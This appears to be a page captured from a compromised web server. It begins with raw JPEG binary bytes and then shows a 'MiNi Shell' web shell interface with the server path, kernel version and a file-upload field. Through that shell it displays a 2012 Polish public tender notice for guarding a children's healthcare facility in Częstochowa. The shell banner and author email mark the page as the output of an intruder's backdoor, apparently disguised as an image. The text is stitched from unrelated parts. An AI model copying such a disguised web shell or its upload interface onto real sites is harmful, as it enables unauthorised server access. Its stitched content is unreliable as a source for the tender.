JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/65548-N-2012.html

<p class="kh_header"><b>Częstochowa: Usługa ochrony osób i mienia oraz obiektu wraz z działką przy ul. Sobieskiego 7a 
w Częstochowie</b><br>
<b>Numer ogłoszenia: 65548 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zakład Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą , ul. Sobieskiego 7a, 42-200 Częstochowa, woj. śląskie, tel. 034 3606135, faks 034 3606135.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ochrony osób i mienia oraz obiektu wraz z działką przy ul. Sobieskiego 7a 
w Częstochowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
1)Świadczenie przez koncesjonowanego Wykonawcę usługi ochrony osób i mienia oraz obiektu wraz z działką przy ul. Sobieskiego 7a w Częstochowie  całodobowo w systemie 12-godzinnym; jednoosobowo przez 4 -5 pracowników, zgodnie z Załącznikiem nr 6 do SIWZ.
2)Usługa ochrony odbywać się będzie metodą patrolowania budynku oraz terenu wokół obiektu w celu niedopuszczenia do zniszczeń lub kradzieży mienia znajdującego się na ochranianym terenie - zgodnie z Planem ochrony określającym warunki wykonywania usługi, uwzględniającym preferencje Zamawiającego i zatwierdzonym przez Zamawiającego przed podpisaniem umowy.
2.Pracownik ochrony fizycznej- wymagania:
1)Zatrudnienie u Wykonawcy do realizacji przedmiotowego zamówienia na podstawie umowy o pracę na okres realizacji przedmiotu zamówienia.Doświadczenie w pracy w zakresie ochrony osób i mienia - minimum 12 miesięcy. Zamawiający zastrzega sobie prawo przed podpisaniem umowy, wglądu do umów pracowników mających wykonywać zamówienie w celu potwierdzenia spełnienia warunków określonych w Specyfikacji
2) Osoby skierowane do ochrony obiektu powinny charakteryzować się schludnym wyglądem,bezwzględną uczciwością i sumiennością.
3) Pracownik ochrony w obiekcie ma być wyposażony w m.in:ubiór firmowy,identyfikator osobowy,latarkę,inny sprzęt (wg wewnętrznego wyposażenia  u Wykonawcy, np. telefon komórkowy)
4)Wykonawca zapewnia wsparcie grupy interwencyjnej szybkiego reagowania w czasie do 10 minut od momentu zgłoszenia takiej potrzeby przez pracownika ochrony oraz zaopatrzenie swoich pracowników w system alarmowy
3.Ochrona budynku i posesji obejmować będzie :
  - systematyczne (co 2 godziny) patrolowanie budynku (korytarzy, klatek schodowych, WC, szatni, wózkowni) i terenu zewnętrznego, nieprzerwanie w ciągu całej doby oraz odnotowywaniu powyższych czynności w Książce służby.
  - dozorowanie terenu posesji, egzekwowanie zakazu parkowania pojazdów na terenie chodnika utrudniających dojście i dojazd karetek pogotowia. Dane pojazdu uprawnionego do parkowania na chodniku przedłoży Zamawiający.
- współpracę z funkcjonariuszami Policji i Straży Miejskiej i niezwłoczne meldowanie przełożonym, odpowiednim służbom oraz Zamawiającemu o zaistniałych wydarzeniach mających wpływ na realizowane zadania.
- bieżące prowadzenie Książki przebiegu służby i okazywanie jej do wglądu osobom uprawnionym ( wzór książki Wykonawca przedstawi do zatwierdzenia Zamawiającemu na 3 dni przed podpisaniem umowy);
- przestrzeganie zasad dyscypliny pracy określonych w wewnętrznych aktach prawnych Wykonawcy  i Planu ochrony nieruchomości,
- przedkładanie Zamawiającemu pisemnych sprawozdań o podejmowanych interwencjach i innych działaniach oraz o występujących na terenie potencjalnych zagrożeniach,
 - przeciwdziałanie wynoszeniu przez osoby nieupoważnione mienia stanowiącego własność  Zakładu.
 - przechowywanie kluczy od pomieszczeń w sposób ustalony przez Zamawiającego,
 - blokowanie drzwi wejściowych do Zakładu poprzez ich zamknięcie, po godzinach pracy i po opuszczeniu budynku przez pracowników
 - prowadzenie obserwacji zdarzeń na monitorach telewizji przemysłowej, w czasie gdy nie wykonuje   innych czynności związanych z ochroną obiektu,
 - prowadzenie ewidencji wejść do budynku osób upoważnionych do wejścia po godzinach pracy oraz odbieranie i wydawanie kluczy pracownikom Zakładu w godzinach ich pracy;
 - sprawdzanie stanu i prawidłowości zamknięcia drzwi i okien po opuszczeniu obiektu przez osoby sprzątające, sprawdzenie stanu oświetlenia i wszelkich zabezpieczeń
- pisemne zgłaszanie Zamawiającemu wszelkich braków lub naruszeń dotyczących zabezpieczenia  mienia na chronionym obiekcie,
-  łączenie rozmów telefonicznych podczas nieobecności telefonistki i po godzinach  jej pracy, 
- niedopuszczenie do kradzieży lub kradzieży z włamaniem mienia Zamawiającego i pracowników Zakładu, w tym mienia znajdującego się w pracowniach, gabinetach, rejestracji, laboratorium i  administracji oraz w windzie,
- przeciwdziałanie zdarzeniom losowym (pożar, zalanie, awarie, itp.) oraz minimalizowanie ich skutków, organizowanie działań ratunkowych, udzielanie pierwszej pomocy osobom tego wymagającym oraz zabezpieczenie miejsca zdarzenia do chwili przybycia odpowiednich służb,
- niedopuszczanie do gromadzenia się osób nieuprawnionych na terenie posesji
-  niedopuszczanie do spożywania alkoholu na terenie posesji,
- niedopuszczanie do aktów wandalizmu wewnątrz i na zewnątrz budynku (zabrudzenia, grafitti, itp.)
- wykonywanie innych czynności, uzgodnionych przez strony umowy. Uzgodnienia niniejsze muszą mieć formę pisemnego aneksu do umowy.
- przestrzeganie bezwzględnego zakazu wprowadzania na teren Zakładu osób nieuprawnionych
- przestrzeganie bezwzględnego zakazu przebywania na terenie portierni osób innych niż pracownik centrali oraz pracownik ochrony wykazany przez Wykonawcę  na stosownym wykazie
2) Pracownik ochrony ponadto zobowiązany jest do:
- zgłaszania się do pracy w stanie pełnej dyspozycyjności psychicznej i fizycznej oraz jej zachowania    w toku pracy,
- niezwłocznego potwierdzenia swojej obecności na terenie obiektu wpisem do książki,
- podejmowania pracy w wyznaczonym terminie - zgodnie z grafikiem służby,
- opuszczania stanowiska pracy dopiero po przekazaniu zmiany  następnemu pracownikowi,
- grzecznego i taktownego zachowania się wobec pracowników i pacjentów, dbałości o estetykę wyglądu zewnętrznego i noszenia umundurowania określonego przepisami  wewnętrznymi Wykonawcy,
- dbałości o sprzęt będący na wyposażeniu stanowiska pracy
- przestrzeganie tajemnicy co do informacji przekazywanych przez Zamawiającego, jak  również informacji pozyskiwanych o pracownikach Zakładu.
3)Wykonawca wykonywać będzie zadania ochronne w ramach uprawnień posiadanych przez  jego pracowników,  wynikających z ustawy o ochronie osób i mienia oraz   legitymującymi się orzeczeniem o niepełnosprawności,  o których mowa w przepisach  o  rehabilitacji zawodowej i społecznej zgodnie z SIWZ,  	uwzględniając jednocześnie specyfikę Zakładu, tj. lecznictwo ambulatoryjne dziecięce;
a) zatrudnienie przy realizacji zamówienia będzie trwać do końca upływu terminu realizacji  zamówienia; w przypadku rozwiązania stosunku pracy przez niepełnosprawnego lub przez pracodawcę przed zakończeniem tego okresu, Wykonawca będzie zobowiązany do zatrudnienia na to miejsce innego niepełnosprawnego o tym samym stopniu niepełnosprawności.
b) Zamawiający ma prawo w każdym okresie realizacji zamówienia zwrócić się do Wykonawcy  o przedstawienie dokumentacji potwierdzającej formę zatrudnienia osób realizujących przedmiot zamówienia oraz dokumentacji potwierdzającej ich niepełnosprawność, którą Wykonawca ma obowiązek przedstawić niezwłocznie Zamawiającemu.
4) Pracownicy ochrony podlegają bezpośrednio osobie odpowiedzialnej ze strony Wykonawcy.  Zamawiający ma jednak prawo przekazywać osobie wykonującej bezpośrednio usługę, uwagi oraz zalecenia dotyczące bieżącego świadczenia zadań objętych umową.
Szczegółowy opis zawiera Specyfikacja Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 2 500 złotych słownie: dwa tysiące pięćset zł
2. Wykonawca wnosi wadium w wybranej przez siebie formie wymienionej w art. 45 ust.6 Pzp  w terminie do 12.03.2012 r.
3. Wadium wniesione w formie przelewu pieniężnego na rachunek bankowy: z adnotacją Wadium - Ochrona osób i mienia
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
5. Wadium wniesione w formie gwarancji lub poręczenia powinno być złożone w osobnej kopercie w depozycie  Zamawiającego za potwierdzeniem na kopii.
6. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art.  45 i 46 Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga  posiadania koncesji  MSWiA  potwierdzającej uprawnienia do wykonywania działalności związanej z przedmiotem niniejszego zamówienia publicznego;Ocena spełnienia  warunku  dokonywana będzie w oparciu  o złożone przez Wykonawcę dokumenty metodą warunku granicznego spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat (styczeń2009-styczeń2012) przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy - w tym okresie dwóch usług ochrony fizycznej o wartości co najmniej 90.000 brutto każda trwających nieprzerwanie przez co najmniej 6 miesięcy.
Ocena spełnienia  warunku  dokonywana będzie w oparciu  o złożone przez Wykonawcę dokumenty metodą warunku granicznego spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia  warunku  dokonywana będzie w oparciu  o złożone przez Wykonawcę dokumenty metodą warunku granicznego spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga przedłożenia wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia.
Ocena spełnienia  warunku  dokonywana będzie w oparciu  o złożone przez Wykonawcę dokumenty metodą warunku granicznego spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane  jest  złożenie  przez Wykonawcę  polisy  lub  innego dokumentu  potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 1.000.000 złotych;Ocena spełnienia  warunku  dokonywana będzie w oparciu  o złożone przez Wykonawcę dokumenty metodą warunku granicznego spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Decyzja Wojewody o przyznaniu statusu Zakładu Pracy Chronionej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w umowie wymagają formy pisemnej pod rygorem nieważności.
2.Zamawiający dopuszcza wprowadzenie zmian w sposobie wykonywania umowy, w tym zmiany sposobu spełnienia świadczenia, w przypadku gdy wystąpi co najmniej jedna z poniższych sytuacji:
a)konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań niż wskazane w ofercie lub opisie przedmiotu zamówienia zgodnie z SIWZ w sytuacji, gdy zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonywaniem umowy,
b) konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań ze względu na zmiany obowiązującego prawa.
3. Ponadto Zamawiający dopuszcza możliwość wprowadzenia zmian w przypadku:
a) rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia w tym zakresie oraz udokumentowane koszty, które Wykonawca poniósł przy wykonywaniu umowy,
  b) zwiększenia przez Zamawiającego przedmiotu umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.republika.pl/wzoz_czestochowa<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Zakład Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą w Częstochowie, ul. Sobieskiego 7a pok. 303.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2012 godzina 10:00, miejsce: Wojewódzki Zakład Opieki Zdrowotnej nad Matką, Dzieckiem i Młodzieżą w Częstochowie, ul. Sobieskiego 7a pok. 308 (III p.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com